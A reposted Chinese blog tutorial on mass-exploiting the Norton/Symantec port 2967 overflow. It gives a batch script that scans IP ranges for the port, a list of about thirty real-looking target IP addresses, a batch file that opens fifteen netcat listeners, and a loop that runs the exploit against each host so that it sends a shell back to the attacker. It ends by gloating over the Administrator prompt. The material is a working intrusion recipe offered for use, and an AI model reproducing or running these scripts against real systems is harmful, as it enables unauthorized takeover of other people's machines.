編寫批處理檔案利用諾頓2967埠溢位獲得控制權
需要準備的軟體工具:
s.exe symantec.exe nc.exe
1、首先編寫一個批處理檔案利用s.exe掃描遠端機器的2967埠。
檔名為sao.bat,內容如下:
@echo Title 諾頓2967掃描工具,製作bye 高迪
color A
@set IPSTART=
@set IPEND=
@set XIANCHENG=5
@echo 在進行溢位之前,您必須進行掃描.
set /p IPSTART=請輸入起始地址:
set /p IPEND=請輸入結束地址:
set /p XIANCHENG=請輸入s.exe掃描的執行緒數(預設為5個):
echo 現在正在掃描,如果您要停止該程式請按Ctrl+C.
s.exe tcp %IPSTART% %IPEND% 2967 %XIANCHENG% /save
2、掃描結束後開啟Result.txt將掃描到的ip地址複製在host.txt檔案內儲存,檔案格式如下(每行一個IP即可):
218.56.22.114
202.152.40.146
202.152.41.28
202.152.41.31
202.152.41.29
202.152.41.30
202.152.41.200
202.152.41.201
202.152.41.203
202.152.41.202
202.152.41.204
202.152.41.205
202.152.41.206
202.152.41.207
202.152.41.208
202.152.41.209
202.152.41.210
202.152.41.211
202.152.41.212
202.152.41.213
202.152.41.214
202.152.41.215
202.152.41.249
202.152.41.250
202.152.41.251
202.152.41.252
202.152.41.253
202.152.41.254
202.152.41.248
3、編寫nc2008.bat,內容如下:
@echo off
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
4、編寫2967.bat,內容如下:
@set IP=
color B
echo 探測本機IP地址並賦值給IP
for /f “tokens=15” %%i in (`ipconfig ^| find /i “ip address”`) do set ip=%%i
@for /f %%i in (host.txt) do symantec -r %%i -l %IP% -d 1234
5、 好了,執行nc2008.bat,再執行2967.bat,觀察剛才開啟的15個CMD視窗,如果有哪個視窗返回C:Documents and SettingsAdministrator> 就OK了,輸入ipconfig 看看該機器IP地址是什麼,用ver檢視一下系統版本,後面的步驟我就不說了。嘿嘿。。。搞定。。。。。。。。。
不過現在絕大多數機器已經把這個漏洞都補上了,掃描可能要費很大功夫。
本文轉自gaodi2002 51CTO部落格,原文連結:http://blog.51cto.com/gaodi2002/1618193
相關文章
- 編寫簡單的windows bat批處理指令碼檔案WindowsBAT指令碼
- window 批處理檔案
- 批處理檔案命令
- Windows批處理檔案Windows
- bat批處理檔案BAT
- 用批處理檔案編譯並執行java編譯Java
- 切換IP批處理檔案
- Python批處理:檔案操作Python
- 集計時對於溢位的捕獲和處理
- IDA批量處理VirusShare樣本獲得asm檔案與bytes檔案ASM
- 批處理檔案 bat 後臺執行BAT
- windows刪除檔案的批處理操作Windows
- 用批處理檔案執行備份
- Excel VBA 利用FileSystemObject處理檔案ExcelObject
- MySQL 數值型別溢位處理MySql型別
- 控制檔案丟失處理方法
- Jenkins執行批處理檔案失敗Jenkins
- 影像處理或其他多媒體處理中的值溢位處理
- 批處理檔案(bat檔案)註冊dll批量註冊dllBAT
- 批處理檔備份oracleOracle
- 字元編碼與檔案處理字元
- 批處理獲得系統當前時間之前n天的時間
- 利用Java編寫HTML檔案分析程式(轉)JavaHTML
- Git處理二進位制檔案Git
- 修改windows遠端桌面連線埠-批處理Windows
- Windows掃描埠連結數批處理薦Windows
- 批處理以當前時間為檔名建立檔案
- 批處理 壓縮zip 並過濾部分檔案
- Linux中利用csvquote處理csv檔案Linux
- bat批處理使用ren批次重新命名檔案,比如批次去掉檔名稱的前4位BAT
- CSS 小結筆記之文字溢位處理CSS筆記
- perl格式串處理整數溢位漏洞(轉)
- 批處理檔案:將目錄下所有的jar檔案都加到CLASSPATHJAR
- oracle 中使用批處理檔案,同時執行,多個.sql檔案。OracleSQL
- 使用無伺服器實現檔案處理的批處理 - DZone Cloud伺服器Cloud
- shell指令碼----轉正答辯得一部分(到目前為止,寫得覺得比較好得一個shell)----從目標機獲取檔案,生成控制檔案,呼叫過程處理然後備份指令碼
- Windows下統計埠連結數的批處理Windows
- 設定Oralce啟動和停止的批處理檔案